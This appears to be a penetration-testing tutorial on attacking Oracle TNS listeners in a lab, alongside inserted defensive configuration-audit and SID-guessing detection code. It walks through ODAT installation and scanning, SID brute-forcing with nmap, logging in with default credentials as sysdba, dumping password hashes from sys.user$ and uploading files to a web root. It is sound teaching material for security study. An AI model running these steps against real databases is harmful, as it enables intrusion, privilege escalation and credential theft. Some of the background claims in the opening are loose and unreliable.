Oracle databases, TNS, and how to hack it.

The Oracle Transparent Network Substrate (TNS) server is a communication protocol that enables communication between Oracle databases and applications across networks. Initially introduced as part of the Oracle Net Services software suite, TNS supports diverse networking protocols, including IPX/SPX and TCP/IP protocol stacks, facilitating communication between Oracle databases and client applications. Its built-in encryption mechanism ensures the security of data transmitted. Over time, TNS has undergone updates to support newer technologies, including IPv6 and SSL/TLS encryption.

Additionally, TNS provides encryption for communication between the client and server, adding an extra layer of security on top of the TCP/IP protocol. This feature helps protect the database architecture from unauthorized access and attacks that aim to compromise data transmitted over the network.

By default, the listener is set to listen for incoming connections on port TCP/1521. However, this default port can be changed either during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP, UDP, and others. It can also manage multiple network interfaces, allowing it to listen on specific IP addresses or on all available interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

The listener will only accept connections from authorized hosts and will perform basic authentication using a combination of hostnames, IP addresses, usernames, and passwords. Additionally, the listener will utilize Oracle Net Services to encrypt communication between the client and the server. The configuration files for Oracle TNS are named **tnsnames.ora** and **listener.ora**, and they are typically located in the **network/admin** directory. These plain-text files contain configuration information for Oracle database instances and other network services that use the TNS protocol.
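Whether the host restrictions and encryption just described are actually enforced depends on the settings in listener.ora and sqlnet.ora. As an added example (not from the original page), here is a constructed default-looking configuration next to a hardened one, with a small Python audit that reports which protections are missing; the listener name, addresses and hostnames are made up.

```python
# Constructed samples of the two files the page names (listener.ora and sqlnet.ora merged
# for brevity); neither is taken from a real system.
WEAK = """
LISTENER = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 0.0.0.0)(PORT = 1521)))
SQLNET.ENCRYPTION_SERVER = ACCEPTED     # the default: encrypt only if the client asks for it
"""

HARDENED = """
LISTENER = (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.7)(PORT = 1521)))
ADMIN_RESTRICTIONS_LISTENER = ON        # no runtime SET commands against the listener named LISTENER
TCP.VALIDNODE_CHECKING = YES            # only the hosts listed below may open a TNS connection
TCP.INVITED_NODES = (10.0.0.20, app01.example.internal)
SQLNET.ENCRYPTION_SERVER = REQUIRED     # refuse sessions that will not negotiate native encryption
SQLNET.ENCRYPTION_TYPES_SERVER = (AES256)
"""

def parse_ora(text: str) -> dict:
    """Minimal reader for the KEY = VALUE lines of sqlnet.ora / listener.ora ('#' starts a comment)."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip().upper()] = value.strip().upper()
    return conf

# (parameter, expected value, finding reported when the parameter is absent or set differently)
CHECKS = [
    ("ADMIN_RESTRICTIONS_LISTENER", "ON", "listener accepts runtime reconfiguration via SET commands"),
    ("TCP.VALIDNODE_CHECKING", "YES", "any host that can reach port 1521 may open a TNS connection"),
    ("SQLNET.ENCRYPTION_SERVER", "REQUIRED", "native encryption is optional, so cleartext sessions are allowed"),
]

def audit(text: str) -> list:
    """Return the findings for one configuration; an empty list means every check passed."""
    conf = parse_ora(text)
    findings = [msg for key, want, msg in CHECKS if conf.get(key) != want]
    if conf.get("TCP.VALIDNODE_CHECKING") == "YES" and "TCP.INVITED_NODES" not in conf:
        findings.append("valid node checking is on but no TCP.INVITED_NODES list is defined")
    return findings

def listener_binds_all_interfaces(text: str) -> bool:
    """True when the listener address uses a wildcard host instead of one specific interface."""
    return "(HOST = 0.0.0.0)" in parse_ora(text).get("LISTENER", "")
```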

Oracle 9 has a default password, CHANGE_ON_INSTALL, while Oracle 10 does not set a default password. Additionally, the Oracle DBSNMP service also ships with a default password, dbsnmp. Many organizations also still run the finger service alongside Oracle, which puts the Oracle service at risk and makes it vulnerable once the relevant home directory is known.

Oracle databases can be safeguarded with a user-created text file known as the PL/SQL Exclusion List (PlsqlExclusionList). This file must be placed within the $ORACLE_HOME/sqldeveloper directory and contains the names of the PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance, where it functions as a blacklist of packages that cannot be reached through the Oracle Application Server.

Oracle Database Attacking Tool (ODAT)

Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python. Its primary purpose is to enumerate and exploit vulnerabilities in Oracle databases. ODAT enables users to identify and exploit various security flaws in Oracle databases, such as SQL injection, remote code execution, and privilege escalation.

Oracle-Tools-setup.sh

#!/bin/bash
# Installs ODAT and the Oracle Instant Client libraries it depends on; run from a working directory.
set -e

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
# Absolute paths, so the client libraries and sqlplus are found regardless of the current directory
export LD_LIBRARY_PATH="$PWD/instantclient_21_12:$LD_LIBRARY_PATH"
export PATH="$PWD/instantclient_21_12:$PATH"
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Testing ODAT (Oracle Database Attacking Tool)

$ ./odat.py -h

usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
...SNIP...

ODAT Scan

$ ./odat.py all -s 10.129.204.235

[+] Checking if target 10.129.204.235:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue...

...SNIP...

[!] Notice: 'mdsys' account is locked, so skipping this username for password           #####################| ETA:  00:01:16 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password       #####################| ETA:  00:01:05 
[!] Notice: 'outln' account is locked, so skipping this username for password           #####################| ETA:  00:00:59
[+] Valid credentials found: scott/tiger. Continue...

...SNIP...

Scan Oracle with Nmap

Nmap includes Oracle scanning scripts as well. First, check whether the default port 1521 is open and reachable.

$ sudo nmap -p1521 -sV 10.129.204.235 --open

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 10:59 EST
Nmap scan report for 10.129.204.235
Host is up (0.0041s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

Nmap – SID Bruteforcing

$ sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 11:01 EST
Nmap scan report for 10.129.204.235
Host is up (0.0044s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute: 
|_  XE

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds
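As an added example (not part of the original page, and not code from nmap or ODAT), here is a small Python detector for the SID guessing that the oracle-sid-brute script above and ODAT's sidguesser perform: it parses the TNS CONNECT packets described at the start of the page, extracts the SID or SERVICE_NAME from each connect descriptor, and flags any source that requests many different SIDs. The capture, addresses and SID names are constructed, and the packet builder exists only to produce that sample input.

```python
import re
import struct
from collections import defaultdict
TNS_CONNECT = 1  # packet type of a TNS CONNECT packet (classic 8-byte header format)

def build_connect_packet(connect_str: str) -> bytes:
    """Build a minimal TNS CONNECT packet; used here only to construct sample traffic."""
    data = connect_str.encode()
    offset = 58                                    # 8-byte header + 42 fixed bytes + 8 pad bytes
    body = struct.pack(">HHHHHHHHHHIBBII8s",
                       0x0136, 0x012C,             # protocol version 310, compatible with 300
                       0, 0x0800, 0x7FFF, 0x4F98,  # service options, SDU, TDU, NT characteristics
                       0, 1, len(data), offset,    # line turnaround, "1 in hardware", data len/offset
                       0x0800, 0x41, 0x41,         # max receivable connect data, connect flags 0/1
                       0, 0, b"\0" * 8)            # trace facility items, unique connection id
    body += b"\0" * 8
    header = struct.pack(">HHBBH", 8 + len(body) + len(data), 0, TNS_CONNECT, 0, 0)
    return header + body + data

def parse_connect_string(pkt: bytes):
    """Return the connect descriptor carried by a CONNECT packet, or None for anything else."""
    if len(pkt) < 28:
        return None
    length, _csum, ptype, _flags, _hcsum = struct.unpack(">HHBBH", pkt[:8])
    if ptype != TNS_CONNECT or length > len(pkt):
        return None
    data_len, data_off = struct.unpack(">HH", pkt[24:28])  # connect-data length and offset fields
    if data_off < 28 or data_off + data_len > length:
        return None                                         # never trust offsets taken from the wire
    return pkt[data_off:data_off + data_len].decode("ascii", "replace")

def requested_sid(connect_str: str):
    """Pull the SID or SERVICE_NAME out of a connect descriptor (upper-cased), if present."""
    m = re.search(r"\((?:SID|SERVICE_NAME)=([^)]*)\)", connect_str, re.IGNORECASE)
    return m.group(1).upper() if m else None

def sid_guessing_sources(packets, threshold=5):
    """Flag sources whose CONNECT packets asked for at least `threshold` distinct SIDs."""
    seen = defaultdict(set)
    for src, pkt in packets:
        cs = parse_connect_string(pkt)
        sid = requested_sid(cs) if cs else None
        if sid:
            seen[src].add(sid)
    return {src: sorted(s) for src, s in seen.items() if len(s) >= threshold}

# Constructed capture: one host walks a SID wordlist, another makes a single normal connection.
CAPTURE = [("10.0.0.5", build_connect_packet(
    f"(DESCRIPTION=(CONNECT_DATA=(SID={sid}))(ADDRESS=(PROTOCOL=TCP)(HOST=10.0.0.7)(PORT=1521)))"))
    for sid in ("ORCL", "XE", "PROD", "TEST", "DEV", "ORACLE")]
CAPTURE.append(("10.0.0.9", build_connect_packet("(DESCRIPTION=(CONNECT_DATA=(SID=XE)))")))
```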

SQLplus – Log In

Once you have connected to the Oracle instance and have valid credentials in hand, you can connect to a specific SID like this:

$ sqlplus scott/tiger@10.129.204.235/XE

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.

ERROR:
ORA-28002: the password will expire within 7 days



Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

If you come across the error "sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory", the Instant Client library directory is not on the dynamic linker's search path. Run the command below to add it; the path must match where your Instant Client is actually installed.

$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"
$ sudo ldconfig

Oracle RDBMS – Interaction

Here is how we would select the names of all tables in the database.

SQL> select table_name from all_tables;

TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
TABLE_PRIVILEGE_MAP
STMT_AUDIT_OPTION_MAP
AUDIT_ACTIONS
WRR$_REPLAY_CALL_FILTER
HS_BULKLOAD_VIEW_OBJ
HS$_PARALLEL_METADATA
HS_PARTITION_COL_NAME
HS_PARTITION_COL_TYPE
HELP

...SNIP...


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Oracle RDBMS – Database Enumeration

In the example below, the user Scott lacks administrative privileges. However, we can attempt to log in with this account as the System Database Admin (sysdba) and thereby obtain higher privileges. This works only when the database administrator has granted Scott the privileges that role requires.

$ sqlplus scott/tiger@10.129.204.235/XE as sysdba

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:32:58 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
...SNIP...

Oracle RDBMS – Extract Password Hashes

We could retrieve the password hashes from the sys.user$ table and try to crack them offline. The query for this looks like the following:

SQL> select name, password from sys.user$;

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN                          4A3BA55E08595C81
EXP_FULL_DATABASE

NAME                           PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
...SNIP...

Oracle RDBMS – File Upload

With ODAT you could try uploading a file to a common web server directory, then reach that file through a web browser or another tool that needs a file on the server in order to execute.

$ echo "Oracle File Upload Test" > testing.txt
$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server                                                                                                  
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server

Then test like this:

$ curl -X GET http://10.129.204.235/testing.txt

Oracle File Upload Test